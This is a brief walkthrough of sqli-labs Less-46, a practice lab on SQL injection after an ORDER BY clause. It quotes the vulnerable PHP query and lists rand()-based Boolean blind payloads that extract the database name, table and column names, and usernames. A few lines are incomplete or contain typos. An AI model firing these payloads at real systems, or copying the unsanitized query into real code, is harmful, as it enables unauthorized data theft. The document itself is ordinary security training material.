SQL injection Less46 (injection after order by + rand() Boolean blind injection)

$id=$_GET['sort'];$sql = "SELECT * FROM users ORDER BY$id";

Our injection point is in the parameters after order by, and order by is different from our injection point after where, we cannot use union etc. for injection.

Test for injection point

?sort=1 desc
?sort=1 asc

desc means descend means descending order
asc means ascend means ascending order

The returned result is different, indicating that it can be injected.Some parameters after order by can be used for injection

The following part has nothing to do with solving the problem, just look at the part of the Boolean blind note.
?sort=right(version(),1)
?sort=left(version(),1)
The returned results are all


I think it may be a character number, so I tried again

I don't know if the type conversion will be done automatically

?sort=5

?sort='5'

So, left(version(),1) should really return a character number

Boolean Blinds

select * from users order by rand();
Randomly sort the users table.
rand() returns a 0-1 floating point number, and order by is followed by the column name or column number.
In fact, it can be understood that a rand field has been added to the users table, and the field value is randomly generated.Sort the users table according to the rand field.So the effect of random sorting is reached.

For more principles, see this
MySQL-17: order by rand()

select * from users order by rand(1);
select * from users order by rand(0);

?sort=rand(1)

?sort=rand(0)

?sot=rand(1=1)

?sort=rand(length(database())=8)

?sort=rand(ascii(substr(database(),1,1))=115)

?sort=rand(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101)

?sort=rand(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i')

?sort=rand(ascii(substr((select username from users limit 0,1), 1,1))=68)

Of course this question can be written with time blind injection and error injection, Less47 will use error injection to write

https://blog.csdn.net/Kevinhanser/article/details/81563461
https://blog.csdn.net/weixin_43901998/article/details/107577630